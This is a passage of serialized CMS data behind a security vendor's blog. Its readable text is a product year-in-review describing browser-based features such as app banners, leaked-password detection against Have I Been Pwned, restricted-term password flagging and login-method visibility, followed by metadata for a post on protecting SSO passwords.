banner.",[],{},{"nodeType":312,"data":248538,"content":248541},{"target":248539},{"sys":248540},{"id":245394,"type":317,"linkType":318},[],{"nodeType":178,"data":248543,"content":248544},{},[248545],{"nodeType":173,"value":248546,"marks":248547,"data":248548},"App banners are custom messages that appear on the signup and login pages of an app and provide quick contextual guidance to employees. They’re fully customizable to match an organization’s policies and voice – even their preferred language (we’ve got at least 1 customer using bilingual app banners). ",[],{},{"nodeType":178,"data":248550,"content":248551},{},[248552],{"nodeType":173,"value":248553,"marks":248554,"data":248555},"We’ll be continuing to iterate on this feature, with more ideas in store.",[],{},{"nodeType":178,"data":248557,"content":248558},{},[248559,248562,248571],{"nodeType":173,"value":37,"marks":248560,"data":248561},[],{},{"nodeType":1698,"data":248563,"content":248566},{"target":248564},{"sys":248565},{"id":245406,"type":317,"linkType":318},[248567],{"nodeType":173,"value":248568,"marks":248569,"data":248570},"More about app banners >>",[],{},{"nodeType":173,"value":37,"marks":248572,"data":248573},[],{},{"nodeType":178,"data":248575,"content":248576},{},[248577],{"nodeType":173,"value":248578,"marks":248579,"data":248580},"Other features we shipped this year that rely on Push’s position in the browser:",[],{},{"nodeType":250,"data":248582,"content":248583},{},[248584,248647],{"nodeType":254,"data":248585,"content":248586},{},[248587,248594],{"nodeType":178,"data":248588,"content":248589},{},[248590],{"nodeType":173,"value":248591,"marks":248592,"data":248593},"Assuring password quality:",[],{},{"nodeType":250,"data":248595,"content":248596},{},[248597],{"nodeType":254,"data":248598,"content":248599},{},[248600,248621],{"nodeType":178,"data":248601,"content":248602},{},[248603,248607,248617],{"nodeType":173,"value":248604,"marks":248605,"data":248606},"Ability to ",[],{},{"nodeType":1698,"data":248608,"content":248612},{"target":248609},{"sys":248610},{"id":248611,"type":317,"linkType":318},"5d9a04bd-bde1-4012-9b91-175e6c90d75c",[248613],{"nodeType":173,"value":248614,"marks":248615,"data":248616},"detect leaked passwords",[],{},{"nodeType":173,"value":248618,"marks":248619,"data":248620}," by comparing a k-anonymized salted hash of a password and the corresponding username to the Have I Been Pwned data set.",[],{},{"nodeType":250,"data":248622,"content":248623},{},[248624],{"nodeType":254,"data":248625,"content":248626},{},[248627],{"nodeType":178,"data":248628,"content":248629},{},[248630,248633,248643],{"nodeType":173,"value":248604,"marks":248631,"data":248632},[],{},{"nodeType":1698,"data":248634,"content":248638},{"target":248635},{"sys":248636},{"id":248637,"type":317,"linkType":318},"cc8f7924-0248-4267-b974-2d6c8559955f",[248639],{"nodeType":173,"value":248640,"marks":248641,"data":248642},"flag passwords that use restricted terms",[],{},{"nodeType":173,"value":248644,"marks":248645,"data":248646},", such as the company name. Administrators can customize this word list.",[],{},{"nodeType":254,"data":248648,"content":248649},{},[248650,248657],{"nodeType":178,"data":248651,"content":248652},{},[248653],{"nodeType":173,"value":248654,"marks":248655,"data":248656},"Guiding end-users at the point of need:",[],{},{"nodeType":250,"data":248658,"content":248659},{},[248660],{"nodeType":254,"data":248661,"content":248662},{},[248663],{"nodeType":178,"data":248664,"content":248665},{},[248666,248670,248678],{"nodeType":173,"value":248667,"marks":248668,"data":248669},"Ability to set ",[],{},{"nodeType":186,"data":248671,"content":248673},{"uri":248672},"/blog/product-release-march-2023/#id-catch-weak-passwords-before-they-happen-with-new-push-labs-feature",[248674],{"nodeType":173,"value":248675,"marks":248676,"data":248677},"inline browser prompts",[],{},{"nodeType":173,"value":248679,"marks":248680,"data":248681}," that alert end-users when they’re signing up or logging in to an app with a weak or reused password and provide them with guidance on fixing the issue.",[],{},{"nodeType":235,"data":248683,"content":248684},{},[248685],{"nodeType":173,"value":248686,"marks":248687,"data":248688},"Organizations don’t need more ‘data’ — they need context and control",[],{},{"nodeType":178,"data":248690,"content":248691},{},[248692],{"nodeType":173,"value":248693,"marks":248694,"data":248695},"A big puzzle we set out to solve this year was how to give customers the context they needed to identify risks and enact decisions about their cloud identities and SaaS estate, without contributing to the noise so commonly associated with legacy tools.",[],{},{"nodeType":178,"data":248697,"content":248698},{},[248699],{"nodeType":173,"value":248700,"marks":248701,"data":248702},"Here’s how we are approaching the solution and what we built this year.",[],{},{"nodeType":178,"data":248704,"content":248705},{},[248706,248711,248715,248724],{"nodeType":173,"value":248707,"marks":248708,"data":248710},"Focus on showing core work apps — but make it possible to see everything:",[248709],{"type":370},{},{"nodeType":173,"value":248712,"marks":248713,"data":248714}," We recently added the ability to see all apps that employees access with their company credentials so customers can get a fuller picture of their identity and app sprawl. This improves the coverage of their app estate. But we also made a conscious choice to segment out those ",[],{},{"nodeType":1698,"data":248716,"content":248719},{"target":248717},{"sys":248718},{"id":148863,"type":317,"linkType":318},[248720],{"nodeType":173,"value":248721,"marks":248722,"data":248723},"“other apps”",[],{},{"nodeType":173,"value":248725,"marks":248726,"data":248727}," (which could be unrelated to work) from the main data tables in the Push platform so the noise is minimal. ",[],{},{"nodeType":178,"data":248729,"content":248730},{},[248731,248735,248744],{"nodeType":173,"value":248732,"marks":248733,"data":248734},"Similarly, Push also now supports the ability to ",[],{},{"nodeType":1698,"data":248736,"content":248739},{"target":248737},{"sys":248738},{"id":245460,"type":317,"linkType":318},[248740],{"nodeType":173,"value":248741,"marks":248742,"data":248743},"monitor all email domains",[],{},{"nodeType":173,"value":248745,"marks":248746,"data":248747}," an employee might use to access work apps, filling in the gaps for users who may be accessing company assets with personal accounts.",[],{},{"nodeType":178,"data":248749,"content":248750},{},[248751,248756,248760,248768],{"nodeType":173,"value":248752,"marks":248753,"data":248755},"Give important context by surfacing login methods:",[248754],{"type":370},{},{"nodeType":173,"value":248757,"marks":248758,"data":248759}," One data point we’ve made a point of enriching in Push this year is ",[],{},{"nodeType":186,"data":248761,"content":248763},{"uri":248762},"/help/audience/administrators/docs/view-saas-apps-and-employee-activity/#view-app-usage-details",[248764],{"nodeType":173,"value":248765,"marks":248766,"data":248767},"login methods",[],{},{"nodeType":173,"value":248769,"marks":248770,"data":248771},". We can now detect if an employee is accessing an app using SAML, OIDC, or local password.",[],{},{"nodeType":178,"data":248773,"content":248774},{},[248775,248779,248788],{"nodeType":173,"value":248776,"marks":248777,"data":248778},"First, this information helps security teams understand where users are actually using apps (unlike legacy solutions that only show network traffic). Second, it helps security teams gauge their progress toward ",[],{},{"nodeType":1698,"data":248780,"content":248783},{"target":248781},{"sys":248782},{"id":161739,"type":317,"linkType":318},[248784],{"nodeType":173,"value":248785,"marks":248786,"data":248787},"reducing identity sprawl",[],{},{"nodeType":173,"value":248789,"marks":248790,"data":248791}," by reducing the use of unmanaged accounts — important context for achieving security goals.",[],{},{"nodeType":178,"data":248793,"content":248794},{},[248795],{"nodeType":173,"value":248796,"marks":248797,"data":248798},"We’re now turning our attention to continue providing meaningful controls — building on the success of our employee guardrails, like app banners, as well as new features for detecting attacks, blocking malicious sites, and preventing phishing. Lots more to come!\n\n",[],{},"A year of building: Top features we shipped this year","Some highlights of what we've built over the last year on our mission of stopping identity attacks.","2024-03-28T00:00:00.000Z","a-year-of-building-top-features-we-shipped-this-year",{"items":248804},[248805,248807],{"sys":248806,"name":18399},{"id":18398},{"sys":248808,"name":117242},{"id":117241},{"items":248810},[248811],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":248812},{"url":19129},{"url":248814},"https://images.ctfassets.net/y1cdw1ablpvd/3FVY7rJiSiWnLgadi9eFoP/090491956211b73133561a42b92394a3/Three_person_podcast__2_.png",{"items":248816},[248817],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":248818},{"url":19129},{"json":248820,"links":249192},{"data":248821,"content":248822,"nodeType":165},{},[248823,248829,248845,248851,248899,248902,248908,248914,248920,248925,248931,248940,248946,248951,248954,248960,248976,248981,248986,248989,248995,249001,249007,249014,249020,249027,249040,249046,249053,249056,249062,249068,249074,249080,249083,249089,249095,249101,249128,249134,249137,249143,249149,249155,249171,249174,249180,249186],{"data":248824,"content":248825,"nodeType":178},{},[248826],{"data":248827,"marks":248828,"value":246848,"nodeType":173},{},[],{"data":248830,"content":248831,"nodeType":178},{},[248832,248835,248842],{"data":248833,"marks":248834,"value":246855,"nodeType":173},{},[],{"data":248836,"content":248837,"nodeType":186},{"uri":9099},[248838],{"data":248839,"marks":248840,"value":246863,"nodeType":173},{},[248841],{"type":194},{"data":248843,"marks":248844,"value":197,"nodeType":173},{},[],{"data":248846,"content":248847,"nodeType":178},{},[248848],{"data":248849,"marks":248850,"value":246873,"nodeType":173},{},[],{"data":248852,"content":248853,"nodeType":250},{},[248854,248863,248872,248881,248890],{"data":248855,"content":248856,"nodeType":254},{},[248857],{"data":248858,"content":248859,"nodeType":178},{},[248860],{"data":248861,"marks":248862,"value":246886,"nodeType":173},{},[],{"data":248864,"content":248865,"nodeType":254},{},[248866],{"data":248867,"content":248868,"nodeType":178},{},[248869],{"data":248870,"marks":248871,"value":246896,"nodeType":173},{},[],{"data":248873,"content":248874,"nodeType":254},{},[248875],{"data":248876,"content":248877,"nodeType":178},{},[248878],{"data":248879,"marks":248880,"value":246906,"nodeType":173},{},[],{"data":248882,"content":248883,"nodeType":254},{},[248884],{"data":248885,"content":248886,"nodeType":178},{},[248887],{"data":248888,"marks":248889,"value":246916,"nodeType":173},{},[],{"data":248891,"content":248892,"nodeType":254},{},[248893],{"data":248894,"content":248895,"nodeType":178},{},[248896],{"data":248897,"marks":248898,"value":246926,"nodeType":173},{},[],{"data":248900,"content":248901,"nodeType":231},{},[],{"data":248903,"content":248904,"nodeType":169},{},[248905],{"data":248906,"marks":248907,"value":246936,"nodeType":173},{},[],{"data":248909,"content":248910,"nodeType":178},{},[248911],{"data":248912,"marks":248913,"value":246943,"nodeType":173},{},[],{"data":248915,"content":248916,"nodeType":178},{},[248917],{"data":248918,"marks":248919,"value":246950,"nodeType":173},{},[],{"data":248921,"content":248924,"nodeType":312},{"target":248922},{"sys":248923},{"id":246955,"type":317,"linkType":318},[],{"data":248926,"content":248927,"nodeType":178},{},[248928],{"data":248929,"marks":248930,"value":246963,"nodeType":173},{},[],{"data":248932,"content":248933,"nodeType":3769},{},[248934],{"data":248935,"content":248936,"nodeType":178},{},[248937],{"data":248938,"marks":248939,"value":246973,"nodeType":173},{},[],{"data":248941,"content":248942,"nodeType":178},{},[248943],{"data":248944,"marks":248945,"value":246980,"nodeType":173},{},[],{"data":248947,"content":248950,"nodeType":312},{"target":248948},{"sys":248949},{"id":246985,"type":317,"linkType":318},[],{"data":248952,"content":248953,"nodeType":231},{},[],{"data":248955,"content":248956,"nodeType":169},{},[248957],{"data":248958,"marks":248959,"value":246996,"nodeType":173},{},[],{"data":248961,"content":248962,"nodeType":178},{},[248963,248966,248973],{"data":248964,"marks":248965,"value":247003,"nodeType":173},{},[],{"data":248967,"content":248968,"nodeType":186},{"uri":247006},[248969],{"data":248970,"marks":248971,"value":247012,"nodeType":173},{},[248972],{"type":194},{"data":248974,"marks":248975,"value":247016,"nodeType":173},{},[],{"data":248977,"content":248980,"nodeType":312},{"target":248978},{"sys":248979},{"id":247021,"type":317,"linkType":318},[],{"data":248982,"content":248985,"nodeType":312},{"target":248983},{"sys":248984},{"id":247027,"type":317,"linkType":318},[],{"data":248987,"content":248988,"nodeType":231},{},[],{"data":248990,"content":248991,"nodeType":169},{},[248992],{"data":248993,"marks":248994,"value":247038,"nodeType":173},{},[],{"data":248996,"content":248997,"nodeType":178},{},[248998],{"data":248999,"marks":249000,"value":247045,"nodeType":173},{},[],{"data":249002,"content":249003,"nodeType":178},{},[249004],{"data":249005,"marks":249006,"value":247052,"nodeType":173},{},[],{"data":249008,"content":249009,"nodeType":178},{},[249010],{"data":249011,"marks":249012,"value":247060,"nodeType":173},{},[249013],{"type":13816},{"data":249015,"content":249016,"nodeType":178},{},[249017],{"data":249018,"marks":249019,"value":247067,"nodeType":173},{},[],{"data":249021,"content":249022,"nodeType":178},{},[249023],{"data":249024,"marks":249025,"value":247075,"nodeType":173},{},[249026],{"type":13816},{"data":249028,"content":249029,"nodeType":178},{},[249030,249033,249037],{"data":249031,"marks":249032,"value":247082,"nodeType":173},{},[],{"data":249034,"marks":249035,"value":247087,"nodeType":173},{},[249036],{"type":1646},{"data":249038,"marks":249039,"value":247091,"nodeType":173},{},[],{"data":249041,"content":249042,"nodeType":178},{},[249043],{"data":249044,"marks":249045,"value":247098,"nodeType":173},{},[],{"data":249047,"content":249048,"nodeType":178},{},[249049],{"data":249050,"marks":249051,"value":247106,"nodeType":173},{},[249052],{"type":13816},{"data":249054,"content":249055,"nodeType":231},{},[],{"data":249057,"content":249058,"nodeType":169},{},[249059],{"data":249060,"marks":249061,"value":247116,"nodeType":173},{},[],{"data":249063,"content":249064,"nodeType":178},{},[249065],{"data":249066,"marks":249067,"value":247123,"nodeType":173},{},[],{"data":249069,"content":249070,"nodeType":178},{},[249071],{"data":249072,"marks":249073,"value":247130,"nodeType":173},{},[],{"data":249075,"content":249076,"nodeType":178},{},[249077],{"data":249078,"marks":249079,"value":247137,"nodeType":173},{},[],{"data":249081,"content":249082,"nodeType":231},{},[],{"data":249084,"content":249085,"nodeType":169},{},[249086],{"data":249087,"marks":249088,"value":247147,"nodeType":173},{},[],{"data":249090,"content":249091,"nodeType":178},{},[249092],{"data":249093,"marks":249094,"value":247154,"nodeType":173},{},[],{"data":249096,"content":249097,"nodeType":178},{},[249098],{"data":249099,"marks":249100,"value":247161,"nodeType":173},{},[],{"data":249102,"content":249103,"nodeType":178},{},[249104,249107,249111,249114,249118,249121,249125],{"data":249105,"marks":249106,"value":247168,"nodeType":173},{},[],{"data":249108,"marks":249109,"value":247173,"nodeType":173},{},[249110],{"type":1646},{"data":249112,"marks":249113,"value":247177,"nodeType":173},{},[],{"data":249115,"marks":249116,"value":247173,"nodeType":173},{},[249117],{"type":1646},{"data":249119,"marks":249120,"value":247185,"nodeType":173},{},[],{"data":249122,"marks":249123,"value":247190,"nodeType":173},{},[249124],{"type":1646},{"data":249126,"marks":249127,"value":247194,"nodeType":173},{},[],{"data":249129,"content":249130,"nodeType":178},{},[249131],{"data":249132,"marks":249133,"value":247201,"nodeType":173},{},[],{"data":249135,"content":249136,"nodeType":231},{},[],{"data":249138,"content":249139,"nodeType":169},{},[249140],{"data":249141,"marks":249142,"value":247211,"nodeType":173},{},[],{"data":249144,"content":249145,"nodeType":178},{},[249146],{"data":249147,"marks":249148,"value":247218,"nodeType":173},{},[],{"data":249150,"content":249151,"nodeType":178},{},[249152],{"data":249153,"marks":249154,"value":247225,"nodeType":173},{},[],{"data":249156,"content":249157,"nodeType":178},{},[249158,249161,249168],{"data":249159,"marks":249160,"value":247232,"nodeType":173},{},[],{"data":249162,"content":249163,"nodeType":186},{"uri":74521},[249164],{"data":249165,"marks":249166,"value":247240,"nodeType":173},{},[249167],{"type":194},{"data":249169,"marks":249170,"value":247244,"nodeType":173},{},[],{"data":249172,"content":249173,"nodeType":231},{},[],{"data":249175,"content":249176,"nodeType":169},{},[249177],{"data":249178,"marks":249179,"value":247254,"nodeType":173},{},[],{"data":249181,"content":249182,"nodeType":178},{},[249183],{"data":249184,"marks":249185,"value":247261,"nodeType":173},{},[],{"data":249187,"content":249188,"nodeType":178},{},[249189],{"data":249190,"marks":249191,"value":247268,"nodeType":173},{},[],{"entries":249193},{"hyperlink":249194,"inline":249195,"block":249196},[],[],[249197,249202,249208,249214],{"sys":249198,"__typename":5345,"title":249199,"caption":118,"layoutMode":118,"file":249200},{"id":246955},"Password reuse detected",{"url":249201,"width":5358,"height":11923},"https://images.ctfassets.net/y1cdw1ablpvd/7KTlqMK8jpGNImQjqdoLr3/d6590ae58135ed929f3ed76fa4ab702e/image2.png",{"sys":249203,"__typename":5345,"title":249204,"caption":118,"layoutMode":118,"file":249205},{"id":246985},"Password reuse image 2",{"url":249206,"width":5358,"height":249207},"https://images.ctfassets.net/y1cdw1ablpvd/14Pd9ANV7IALxMh4lh4tZQ/08a9bf87cc48916b814a35ff503fa982/image1.png",885,{"sys":249209,"__typename":5345,"title":249210,"caption":249211,"layoutMode":118,"file":249212},{"id":247021},"password reuse image 3","A formal employee message",{"url":249213,"width":5358,"height":173179},"https://images.ctfassets.net/y1cdw1ablpvd/4zOIKm4CM9AkOJtMXOO3cI/a23143a8fe2604bb445d2b5eb7dc9e24/image3.png",{"sys":249215,"__typename":5345,"title":249216,"caption":249217,"layoutMode":118,"file":249218},{"id":247027},"Password image 4","A multi-lingual employee message",{"url":249219,"width":5358,"height":249220},"https://images.ctfassets.net/y1cdw1ablpvd/3p44G0SJzMazQhr4Yistr/d084631c64cc961128dc3a15f03e2ee6/image4.png",612,"content:blog:dev-diary-phishing-prevention-behind-the-scenes.json","blog/dev-diary-phishing-prevention-behind-the-scenes.json","blog/dev-diary-phishing-prevention-behind-the-scenes",{"_path":249225,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":249226,"summary":249228,"title":236248,"subtitle":118,"metaTitle":249239,"synopsis":236249,"hashTags":118,"publishedDate":236250,"slug":236251,"tagsCollection":249240,"relatedBlogPostsCollection":249246,"ogImage":251928,"authorsCollection":251930,"content":251934,"_id":252437,"_type":5439,"_source":5440,"_file":252438,"_stem":252439,"_extension":5439},"/blog/introducing-sso-password-protection",{"id":189461,"publishedAt":249227},"2026-01-30T09:26:18.384Z",{"json":249229},{"data":249230,"content":249231,"nodeType":165},{},[249232],{"data":249233,"content":249234,"nodeType":178},{},[249235],{"data":249236,"marks":249237,"value":249238,"nodeType":173},{},[],"Use the Push browser agent’s unique vantage point to protect SSO credentials by blocking employees from entering their password into any other site.","How to protect SSO passwords in the browser",{"items":249241},[249242,249244],{"sys":249243,"name":509},{"id":508},{"sys":249245,"name":18399},{"id":18398},{"items":249247},[249248],{"__typename":1528,"sys":249249,"content":249250,"title":223970,"synopsis":223971,"hashTags":118,"publishedDate":223972,"slug":223973,"tagsCollection":251918,"authorsCollection":251924},{"id":202170},{"json":249251},{"nodeType":165,"data":249252,"content":249253},{},[249254,249260,249286,249292,249297,249303,249319,249340,249346,249352,249372,249385,249391,249401,249407,249410,249416,249422,249435,249445,249451,249477,249480,249486,249502,249508,249515,249600,249606,249722,249728,249829,249835,249841,250001,250007,250013,250088,250091,250097,250103,250109,250166,250172,250202,250208,250247,250253,250259,250478,250484,250491,250497,250500,250506,250512,250518,250566,250572,250611,250617,250647,250653,250659,250819,250825,250832,250838,250845,250851,250858,250864,250867,250873,250879,250885,250942,250948,250978,250984,251014,251020,251026,251127,251130,251136,251142,251148,251205,251211,251241,251247,251277,251283,251289,251453,251456,251462,251468,251474,251540,251546,251576,251582,251612,251618,251624,251843,251846,251852,251858,251864,251870,251873,251879,251885,251891,251894,251900,251906,251912],{"nodeType":169,"data":249255,"content":249256},{},[249257],{"nodeType":173,"value":221052,"marks":249258,"data":249259},[],{},{"nodeType":178,"data":249261,"content":249262},{},[249263,249266,249273,249276,249283],{"nodeType":173,"value":221059,"marks":249264,"data":249265},[],{},{"nodeType":186,"data":249267,"content":249268},{"uri":221064},[249269],{"nodeType":173,"value":221067,"marks":249270,"data":249272},[249271],{"type":194},{},{"nodeType":173,"value":221072,"marks":249274,"data":249275},[],{},{"nodeType":186,"data":249277,"content":249278},{"uri":221077},[249279],{"nodeType":173,"value":221080,"marks":249280,"data":249282},[249281],{"type":194},{},{"nodeType":173,"value":1477,"marks":249284,"data":249285},[],{},{"nodeType":178,"data":249287,"content":249288},{},[249289],{"nodeType":173,"value":221091,"marks":249290,"data":249291},[],{},{"nodeType":312,"data":249293,"content":249296},{"target":249294},{"sys":249295},{"id":221098,"type":317,"linkType":318},[],{"nodeType":178,"data":249298,"content":249299},{},[249300],{"nodeType":173,"value":221104,"marks":249301,"data":249302},[],{},{"nodeType":178,"data":249304,"content":249305},{},[249306,249309,249316],{"nodeType":173,"value":221111,"marks":249307,"data":249308},[],{},{"nodeType":186,"data":249310,"content":249311},{"uri":221116},[249312],{"nodeType":173,"value":221119,"marks":249313,"data":249315},[249314],{"type":194},{},{"nodeType":173,"value":221124,"marks":249317,"data":249318},[],{},{"nodeType":250,"data":249320,"content":249321},{},[249322,249331],{"nodeType":254,"data":249323,"content":249324},{},[249325],{"nodeType":178,"data":249326,"content":249327},{},[249328],{"nodeType":173,"value":221137,"marks":249329,"data":249330},[],{},{"nodeType":254,"data":249332,"content":249333},{},[249334],{"nodeType":178,"data":249335,"content":249336},{},[249337],{"nodeType":173,"value":221147,"marks":249338,"data":249339},[],{},{"nodeType":178,"data":249341,"content":249342},{},[249343],{"nodeType":173,"value":221154,"marks":249344,"data":249345},[],{},{"nodeType":235,"data":249347,"content":249348},{},[249349],{"nodeType":173,"value":221161,"marks":249350,"data":249351},[],{},{"nodeType":178,"data":249353,"content":249354},{},[249355,249358,249362,249365,249369],{"nodeType":173,"value":221168,"marks":249356,"data":249357},[],{},{"nodeType":173,"value":221172,"marks":249359,"data":249361},[249360],{"type":370},{},{"nodeType":173,"value":221177,"marks":249363,"data":249364},[],{},{"nodeType":173,"value":221181,"marks":249366,"data":249368},[249367],{"type":1646},{},{"nodeType":173,"value":10557,"marks":249370,"data":249371},[],{},{"nodeType":178,"data":249373,"content":249374},{},[249375,249378,249382],{"nodeType":173,"value":221192,"marks":249376,"data":249377},[],{},{"nodeType":173,"value":221196,"marks":249379,"data":249381},[249380],{"type":370},{},{"nodeType":173,"value":221201,"marks":249383,"data":249384},[],{},{"nodeType":178,"data":249386,"content":249387},{},[249388],{"nodeType":173,"value":221208,"marks":249389,"data":249390},[],{},{"nodeType":178,"data":249392,"content":249393},{},[249394,249397],{"nodeType":173,"value":221215,"marks":249395,"data":249396},[],{},{"nodeType":173,"value":221219,"marks":249398,"data":249400},[249399],{"type":370},{},{"nodeType":178,"data":249402,"content":249403},{},[249404],{"nodeType":173,"value":221227,"marks":249405,"data":249406},[],{},{"nodeType":231,"data":249408,"content":249409},{},[],{"nodeType":169,"data":249411,"content":249412},{},[249413],{"nodeType":173,"value":221237,"marks":249414,"data":249415},[],{},{"nodeType":178,"data":249417,"content":249418},{},[249419],{"nodeType":173,"value":221244,"marks":249420,"data":249421},[],{},{"nodeType":178,"data":249423,"content":249424},{},[249425,249428,249432],{"nodeType":173,"value":221251,"marks":249426,"data":249427},[],{},{"nodeType":173,"value":221255,"marks":249429,"data":249431},[249430],{"type":1646},{},{"nodeType":173,"value":221260,"marks":249433,"data":249434},[],{},{"nodeType":178,"data":249436,"content":249437},{},[249438,249441],{"nodeType":173,"value":221267,"marks":249439,"data":249440},[],{},{"nodeType":173,"value":221271,"marks":249442,"data":249444},[249443],{"type":370},{},{"nodeType":178,"data":249446,"content":249447},{},[249448],{"nodeType":173,"value":221279,"marks":249449,"data":249450},[],{},{"nodeType":178,"data":249452,"content":249453},{},[249454,249457,249464,249467,249474],{"nodeType":173,"value":221286,"marks":249455,"data":249456},[],{},{"nodeType":186,"data":249458,"content":249459},{"uri":88239},[249460],{"nodeType":173,"value":221293,"marks":249461,"data":249463},[249462],{"type":194},{},{"nodeType":173,"value":221298,"marks":249465,"data":249466},[],{},{"nodeType":186,"data":249468,"content":249469},{"uri":221303},[249470],{"nodeType":173,"value":221306,"marks":249471,"data":249473},[249472],{"type":194},{},{"nodeType":173,"value":2340,"marks":249475,"data":249476},[],{},{"nodeType":231,"data":249478,"content":249479},{},[],{"nodeType":169,"data":249481,"content":249482},{},[249483],{"nodeType":173,"value":221320,"marks":249484,"data":249485},[],{},{"nodeType":178,"data":249487,"content":249488},{},[249489,249492,249499],{"nodeType":173,"value":221327,"marks":249490,"data":249491},[],{},{"nodeType":186,"data":249493,"content":249494},{"uri":4057},[249495],{"nodeType":173,"value":221334,"marks":249496,"data":249498},[249497],{"type":194},{},{"nodeType":173,"value":197,"marks":249500,"data":249501},[],{},{"nodeType":235,"data":249503,"content":249504},{},[249505],{"nodeType":173,"value":221345,"marks":249506,"data":249507},[],{},{"nodeType":178,"data":249509,"content":249510},{},[249511],{"nodeType":173,"value":221352,"marks":249512,"data":249514},[249513],{"type":1646},{},{"nodeType":250,"data":249516,"content":249517},{},[249518,249527,249546,249555,249564,249573,249582,249591],{"nodeType":254,"data":249519,"content":249520},{},[249521],{"nodeType":178,"data":249522,"content":249523},{},[249524],{"nodeType":173,"value":221366,"marks":249525,"data":249526},[],{},{"nodeType":254,"data":249528,"content":249529},{},[249530],{"nodeType":178,"data":249531,"content":249532},{},[249533,249536,249543],{"nodeType":173,"value":221376,"marks":249534,"data":249535},[],{},{"nodeType":186,"data":249537,"content":249538},{"uri":174799},[249539],{"nodeType":173,"value":221383,"marks":249540,"data":249542},[249541],{"type":194},{},{"nodeType":173,"value":221388,"marks":249544,"data":249545},[],{},{"nodeType":254,"data":249547,"content":249548},{},[249549],{"nodeType":178,"data":249550,"content":249551},{},[249552],{"nodeType":173,"value":221398,"marks":249553,"data":249554},[],{},{"nodeType":254,"data":249556,"content":249557},{},[249558],{"nodeType":178,"data":249559,"content":249560},{},[249561],{"nodeType":173,"value":4245,"marks":249562,"data":249563},[],{},{"nodeType":254,"data":249565,"content":249566},{},[249567],{"nodeType":178,"data":249568,"content":249569},{},[249570],{"nodeType":173,"value":4255,"marks":249571,"data":249572},[],{},{"nodeType":254,"data":249574,"content":249575},{},[249576],{"nodeType":178,"data":249577,"content":249578},{},[249579],{"nodeType":173,"value":4265,"marks":249580,"data":249581},[],{},{"nodeType":254,"data":249583,"content":249584},{},[249585],{"nodeType":178,"data":249586,"content":249587},{},[249588],{"nodeType":173,"value":221435,"marks":249589,"data":249590},[],{},{"nodeType":254,"data":249592,"content":249593},{},[249594],{"nodeType":178,"data":249595,"content":249596},{},[249597],{"nodeType":173,"value":221445,"marks":249598,"data":249599},[],{},{"nodeType":235,"data":249601,"content":249602},{},[249603],{"nodeType":173,"value":221452,"marks":249604,"data":249605},[],{},{"nodeType":250,"data":249607,"content":249608},{},[249609,249625,249651,249674,249690,249706],{"nodeType":254,"data":249610,"content":249611},{},[249612],{"nodeType":178,"data":249613,"content":249614},{},[249615,249618,249622],{"nodeType":173,"value":221465,"marks":249616,"data":249617},[],{},{"nodeType":173,"value":221469,"marks":249619,"data":249621},[249620],{"type":370},{},{"nodeType":173,"value":221474,"marks":249623,"data":249624},[],{},{"nodeType":254,"data":249626,"content":249627},{},[249628],{"nodeType":178,"data":249629,"content":249630},{},[249631,249634,249638,249641,249648],{"nodeType":173,"value":221484,"marks":249632,"data":249633},[],{},{"nodeType":173,"value":221488,"marks":249635,"data":249637},[249636],{"type":370},{},{"nodeType":173,"value":221493,"marks":249639,"data":249640},[],{},{"nodeType":186,"data":249642,"content":249643},{"uri":3999},[249644],{"nodeType":173,"value":4005,"marks":249645,"data":249647},[249646],{"type":194},{},{"nodeType":173,"value":4009,"marks":249649,"data":249650},[],{},{"nodeType":254,"data":249652,"content":249653},{},[249654],{"nodeType":178,"data":249655,"content":249656},{},[249657,249660,249664,249667,249671],{"nodeType":173,"value":221513,"marks":249658,"data":249659},[],{},{"nodeType":173,"value":221517,"marks":249661,"data":249663},[249662],{"type":370},{},{"nodeType":173,"value":221522,"marks":249665,"data":249666},[],{},{"nodeType":173,"value":221526,"marks":249668,"data":249670},[249669],{"type":370},{},{"nodeType":173,"value":221531,"marks":249672,"data":249673},[],{},{"nodeType":254,"data":249675,"content":249676},{},[249677],{"nodeType":178,"data":249678,"content":249679},{},[249680,249683,249687],{"nodeType":173,"value":221541,"marks":249681,"data":249682},[],{},{"nodeType":173,"value":221545,"marks":249684,"data":249686},[249685],{"type":370},{},{"nodeType":173,"value":221550,"marks":249688,"data":249689},[],{},{"nodeType":254,"data":249691,"content":249692},{},[249693],{"nodeType":178,"data":249694,"content":249695},{},[249696,249699,249703],{"nodeType":173,"value":221560,"marks":249697,"data":249698},[],{},{"nodeType":173,"value":221564,"marks":249700,"data":249702},[249701],{"type":370},{},{"nodeType":173,"value":221569,"marks":249704,"data":249705},[],{},{"nodeType":254,"data":249707,"content":249708},{},[249709],{"nodeType":178,"data":249710,"content":249711},{},[249712,249715,249719],{"nodeType":173,"value":221579,"marks":249713,"data":249714},[],{},{"nodeType":173,"value":221583,"marks":249716,"data":249718},[249717],{"type":370},{},{"nodeType":173,"value":221588,"marks":249720,"data":249721},[],{},{"nodeType":235,"data":249723,"content":249724},{},[249725],{"nodeType":173,"value":221595,"marks":249726,"data":249727},[],{},{"nodeType":250,"data":249729,"content":249730},{},[249731,249747,249783,249806],{"nodeType":254,"data":249732,"content":249733},{},[249734],{"nodeType":178,"data":249735,"content":249736},{},[249737,249740,249744],{"nodeType":173,"value":221608,"marks":249738,"data":249739},[],{},{"nodeType":173,"value":221612,"marks":249741,"data":249743},[249742],{"type":370},{},{"nodeType":173,"value":221617,"marks":249745,"data":249746},[],{},{"nodeType":254,"data":249748,"content":249749},{},[249750],{"nodeType":178,"data":249751,"content":249752},{},[249753,249756,249763,249766,249770,249773,249780],{"nodeType":173,"value":221627,"marks":249754,"data":249755},[],{},{"nodeType":186,"data":249757,"content":249758},{"uri":832},[249759],{"nodeType":173,"value":835,"marks":249760,"data":249762},[249761],{"type":194},{},{"nodeType":173,"value":2936,"marks":249764,"data":249765},[],{},{"nodeType":173,"value":221641,"marks":249767,"data":249769},[249768],{"type":370},{},{"nodeType":173,"value":221646,"marks":249771,"data":249772},[],{},{"nodeType":186,"data":249774,"content":249775},{"uri":184425},[249776],{"nodeType":173,"value":221653,"marks":249777,"data":249779},[249778],{"type":194},{},{"nodeType":173,"value":481,"marks":249781,"data":249782},[],{},{"nodeType":254,"data":249784,"content":249785},{},[249786],{"nodeType":178,"data":249787,"content":249788},{},[249789,249793,249796,249803],{"nodeType":173,"value":221667,"marks":249790,"data":249792},[249791],{"type":370},{},{"nodeType":173,"value":221672,"marks":249794,"data":249795},[],{},{"nodeType":186,"data":249797,"content":249798},{"uri":4411},[249799],{"nodeType"